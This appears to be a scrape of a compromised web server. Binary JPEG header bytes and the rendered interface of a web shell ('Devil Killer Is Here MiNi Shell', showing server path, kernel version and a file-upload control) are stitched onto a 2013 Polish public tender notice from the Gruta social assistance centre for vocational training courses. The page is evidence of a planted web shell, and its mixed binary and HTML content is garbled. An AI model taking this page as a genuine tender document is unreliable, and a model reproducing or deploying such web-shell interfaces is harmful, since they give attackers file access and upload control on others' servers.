JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302482-N-2013.html

<p class="kh_header"><b>Gruta: Usługi w zakresie przeprowadzenia kursów, szkoleń i zajęć edukacyjno - terapeutycznych dla osób zakwalifikowanych do udziału w projekcie systemowym  Aktywna integracja w Gminie Gruta - drogą do zatrudnienia</b><br>
<b>Numer ogłoszenia: 302482 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Gruta 244, 86-330 Gruta, woj. kujawsko-pomorskie, tel. 56 468 31 21, faks 56 468 31 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.bip.gruta.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie przeprowadzenia kursów, szkoleń i zajęć edukacyjno - terapeutycznych dla osób zakwalifikowanych do udziału w projekcie systemowym  Aktywna integracja w Gminie Gruta - drogą do zatrudnienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi w zakresie przeprowadzenia szkoleń i zajęć edukacyjno -  terapeutycznych  dla  osób zakwalifikowanych do udziału w projekcie systemowym Aktywna integracja w Gminie Gruta - drogą do zatrudnienia w następującym zakresie: 
Zadanie numer 1 - Kurs mała gastronomia z obsługą kas fiskalnych -3 osoby.
Zadanie numer 2 - Terapia psychologiczna -1 osoba.
 Zadanie numer 3- Kurs operatora koparko - ładowarki i  operatora spycharek - 1 osoba.
Zadanie numer 4-  Kurs   florystyki i bukieciarstwa  z obsługą kasy fiskalnej - 2 osoby. 
Zadanie numer 5 - Kurs opiekuna osoby  starszej -   2 osoby
Zadanie numer 6 - Kurs  elektromontera - 2  osoby
Zadanie numer 7 - Kurs   brukarza z uprawnieniami operatora  zagęszczarki i ubijaków wibracyjnych  - 2 osoby 
Zadanie numer 8 - Kurs pilarza - drwala  z obsługą pił mechanicznych - 4 osoby
Zadanie numer 9 - kurs komputerowy - 4 osoby

 Szczegółowy opis przedmiotu zamówienia:
Zadanie nr 1:  Kurs mała gastronomia z obsługą kas fiskalnych -3 osoby.  Liczba godzin 180 dla każdego uczestnika (teoria i praktyka). Program kursu zgodny z  obowiązującymi przepisami prawa. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
Zadanie numer 2 - Terapia psychologiczna -1 osoba. Zajęcia muszą się odbywać  indywidualne, w wymiarze 10 godzin na uczestnika. Terapia kończy się 
wydaniem zaświadczenia psychologa o uczestnictwie w terapii.
Zadanie numer 3- Kurs  operatora koparko - ładowarki i  operatora spycharek - 
1 osoba Przeprowadzenie dwóch kursów dla jednej osoby. Liczba godzin każdego z kursów to:116 godzin teorii i 60 godz. praktyki. Program szkolenia powinien być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r.  sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U.  z 2001, Nr 118, poz. 1263 z późn. zm.) oraz zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenia,  dyplomy o ukończeniu kursów zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych 
(Dz.U.  z 2012, poz.186 z późn. zm.). Książeczki operatora, świadectwa ukończenia kursów wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
Zadanie  numer 4-  Kurs   florystyki i bukieciarstwa  z obsługą kasy fiskalnej - 2 osoby.  Liczba godzin 50 dla każdego uczestnika, (9 godzin zajęć teoretycznych oraz 41 godzin zajęć praktycznych) oraz kurs obsługi kasy fiskalnej. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie,  dyplom o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
Zadanie numer 5 - kurs opiekuna osoby starszej - 2 osoby . Liczba godzin 180 na każdego uczestnika (teoria i praktyka). Praktyka w odpowiednich placówka opiekuńczych. Program szkolenia powinien być zgodny z przepisami obowiązującego prawa. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
Zadanie numer 6 - Kurs  elektromontera - 2  osoby.  Szkolenie  uprawniające do obsługi urządzeń, należących do  grupy I: tj. Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną. Program szkolenia i  dokumenty potwierdzające nabycie kwalifikacji zgodne z Rozporządzeniem Ministra  Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U.  z 2003 Nr 89, poz. 828 ze. zm.). 
Zadanie numer 7- Kurs brukarza  z uprawnieniami operatora zagęszczarki i ubijaków wibracyjnych- 2 osoby. Liczba godzin 200.  Szkolenia mają obejmować  zajęcia teoretyczne i praktyczne w zakresie pozwalającym na przygotowanie się do zawodu Brukarz z uprawnieniami operatora zagęszczarki i ubijaków wibracyjnych. W ramach szkolenia uczestnicy powinni zostać kompleksowo przygotowani do wykonywania i remontu nawierzchni ulic, placów, parkingów chodników, skarp z kostek, z kamieni naturalnych lub sztucznych oraz z płyt kamiennych lub betonowych, wykonania drobnych robót ziemnych, podbudowy i posypki, krawężnikowania, robót wykończeniowych nawierzchni, jak również przestrzegania zasad bezpieczeństwa i higieny pracy. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
 Zadanie numer 8 - Kurs pilarza - drwala  z obsługą pił mechanicznych - 4  osoby. Liczba godzin 180 na każdego uczestnika (teoria i praktyka).   Program kursu przewiduje opanowanie przez kursantów  wiadomości z zakresu budowy i zasad działania pilarki spalinowej oraz sprzętu pomocniczego używanego przy pozyskaniu drewna, jak również podstawowych wiadomości o organizacji procesu technologicznego pozyskania drewna oraz zagrożeń życia i zdrowia z nim związanych. Program  ma obejmować, również bieżącą konserwację użytkowanego  sprzętu, przepisy ochrony przeciw pożarowej i pierwszej pomocy. Program szkolenia zgodny zarządzeniem Dyrektora Generalnego Lasów Państwowych  w sprawie ramowego programu kursu dla drwali - operatorów pilarki z zakresu wiedzy i umiejętności wymaganych do wykonywania i zawodu oraz obowiązującymi przepisami prawa. Kurs daje uprawnienia do samodzielnej ścinki drzew stojących i obsługi pił. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawiczne go w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
Zadanie numer 9 - kurs obsługi komputera  dla 4 osób z niepełnosprawnością intelektualną w stopniu umiarkowanym i lekkim. Przeprowadzenie 30 godzin lekcyjnych kursu komputerowego - zakres podstawowy. Wymagane dokumenty potwierdzające ukończenie kursu: zaświadczenie o ukończeniu kursu zgodne z Rozporządzeniem Ministra Edukacji Narodowej  z dnia 11 stycznia 2012 r.  w sprawie kształcenia ustawiczne go w formach pozaszkolnych (Dz.U.  z 2012, poz.186 z późn. zm.).
Szkolenia, kursy będą realizowane w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
Zamawiający skieruje na szkolenie ogółem 20  osób, 1 osoba skierowana na kurs w ramach zadania nr 4, będzie również skierowana na terapię psychologiczną w ramach zadania nr 2.  Zamawiający zastrzega  sobie prawo zmniejszenia  ilości uczestników. 
Zamawiający wymaga aby szkolenia, kursy odbywały się nie dalej niż w obrębie 50 km od Gruty  (z wyłączeniem  zadanie nr 9  (kurs komputerowy) opisane w ppkt. 2.9,  gdzie Zamawiający   wymaga aby zajęcia odbywały się w miejscowości Gruta, gdzie bezpłatnie udostępni oświetloną sale, wyposażoną w stoliki i krzesła, z dostępem do prądu i bezprzewodowego internetu)
Szkolenia, kursy  w części teoretycznej winny być przeprowadzone w dniach od poniedziałku do piątku, w wymiarze nie przekraczającym 8 godzin dydaktycznych ( 45 minut)  dziennie.
Szkolenia, kursy  w części praktycznej winny być przeprowadzone w dniach od poniedziałku do  soboty, w wymiarze nie przekraczającym 8 godzin dziennie.
Wszystkie szkolenia/kursy zawodowe muszą kończyć się egzaminem, czas trwania egzaminu nie może być ujęty w liczbie godzin szkolenia. 
Zamawiający wymaga, aby Wykonawca zapewnił w  trakcie szkolenia: 
warunki zgodne z ogólnymi przepisami bezpieczeństwa i higieny pracy  z zachowaniem przepisów dotyczących ochrony środowiska,
odzież ochronną i obuwie jeżeli wymaga tego specyfika szkolenia, kursu,
dowóz uczestników  szkoleń/kursów na szkolenia realizowane w ramach zadań od 1 do 8 z trasy Słup- Gruta -Mełno -Okonin na miejsce szkolenia, jak również powrót z miejsca szkolenia na ww. trasie. (z wyłączeniem zajęć  odbywających się w ramach zadania 9 - kurs komputerowy, gdzie uczestnicy kursu dojadą na zajęcia  we własnym zakresie).  
odpowiednie warunki lokalowe do prowadzenia zajęć teoretycznych i praktycznych.
e)	   nieodpłatne materiały szkoleniowe, przekazane każdemu z uczestników na własność, zawierające minimum: podręcznik uwzględniający tematykę zawartą w programie szkolenia, notatnik w twardej oprawie - format  A4, długopis, a także niezbędne materiały dydaktyczne.  Materiały szkoleniowe, za wyjątkiem długopisu, muszą być oznaczone zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
f)	 Poczęstunek wszystkich  dla uczestników szkolenia (catering) - obiad oraz bufet kawowy (kawa, herbata, woda mineralna, sok owocowy, suche ciastka, kanapki, drożdżówki itp.) w każdym dniu prowadzenia szkoleń. 
g)	  ubezpieczenie  od następstw nieszczęśliwych wypadków od dnia rozpoczęcia szkolenia/kursu do dnia jego  zakończenia  (koszt ubezpieczenia musi być ujęty w cenie oferty), 
h)	zorganizować badania lekarskie niezbędne do odbycia szkolenia, kursu i zapewnić opiekuna grupie podczas badań. Kursantów na  badania należy przewieźć z trasy Słup- Gruta -Mełno - Okonin na miejsce badania, jak również z powrotem z miejsca  badania  na ww. trasie.  
10	Wykonawca jest zobowiązany prowadzić  dokumentację przebiegu szkolenia/kursu  tj: dziennik zajęć zgodny z ustalonym programem nauczania,  listę obecności, protokoły egzaminacyjne, rejestr certyfikatów i świadectw, dokumentacje zdjęciową. Wszystkie dokumenty powinny być oznakowane zgodnie z wytycznymi realizacji programów POKL. 


11.	Wykonawca po zakończeniu szkoleń/kursów i obyciu egzaminów  jest zobowiązany w ciągu     7 dni roboczych przekazać Zamawiającemu:
a)  imienny wykaz osób, które  ukończyły szkolenia/kursy
b) imienny wykaz osób, które nie ukończyły szkolenia/kursu.
c) listy obecności  uczestników na poszczególnych etapach realizacji szkoleń/kursów oraz listy   potwierdzające każdorazowy  cateringu.  
d) oryginalne lub potwierdzone za zgodność z oryginałem kserokopie zaświadczeń lub innych dokumentów potwierdzających ukończenie szkoleń/kursów. 
e) zdjęcia ze szkolenia, 
f) kserokopie badań lekarskich,
g) potwierdzenie otrzymania przez uczestników szkolenia, kursu materiałów szkoleniowych,
f) kserokopii polisy ubezpieczeniowej uczestników,
12. Wykonawca zobowiązany jest:
  a)  udostępnić Zamawiającemu  na  jego żądanie dokumentów dotyczących postępów w realizacji     szkoleń, kursów, 
b)	 poddać się kontroli  dokonywanej przez Zamawiającego jak i Instytucję Pośredniczącą -Regionalnego Ośrodka Polityki Społecznej w Toruniu, 
c)	niezwłocznie  poinformować Zamawiającego o wszelkich zmianach i problemach mających wpływ  na przebieg realizacji szkoleń, kursów..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  dopuszcza udzielenie zamówień  uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych w ilości do 50% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca  składa oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że zostały wykonane lub są wykonywane należycie usługi w okresie trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, przynajmniej czterech z  niżej wymienionych szkoleń/kursów:  kurs mała gastronomia z obsługą kas fiskalnych, terapia psychologiczna, kurs operatora koparko - ładowarki i  operatora spycharek, kurs   florystyki i bukieciarstwa  z obsługą kasy fiskalnej, kurs opiekuna osoby  starszej, kurs  elektromonter, kurs   brukarza z uprawnieniami operatora  zagęszczarki i ubijaków wibracyjnych, kurs pilarza - drwala  z obsługą pił mechanicznych,  kurs komputerowy - wzór załącznik nr  4  do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca  składa oświadczenie o dysponowaniu odpowiednim zapleczem technicznym umożliwiającym prawidłową realizację zamówienia - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca dysponuje przynajmniej  jedną osobą  zdolną  do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia dla każdego z niżej wymienionych kursów, szkoleń: kurs mała gastronomia z obsługą kas fiskalnych, terapia psychologiczna, kurs operatora koparko - ładowarki i  operatora spycharek, kurs   florystyki i bukieciarstwa  z obsługą kasy fiskalnej, kurs opiekuna osoby  starszej, kurs  elektromonter, kurs brukarza z uprawnieniami operatora  zagęszczarki i ubijaków wibracyjnych, kurs pilarza - drwala  z obsługą pił mechanicznych,  kurs komputerowy poprzez wykazanie osób, które będą uczestniczyć w realizacji szkolenia  i  wskazanie podstawy dysponowania tymi osobami  z oświadczeniem Wykonawcy wg wzoru - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, że znajduje się w sytuacji  ekonomicznej i finansowej  zapewniającej  wykonanie zamówienia  -  zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty
 Projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.bip.gruta.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny  Ośrodek Pomocy Społecznej w Grucie, Gruta 244 86-330 Mełno, od poniedziałku do piątku w godz. od 7.30 do 15.30.</p>
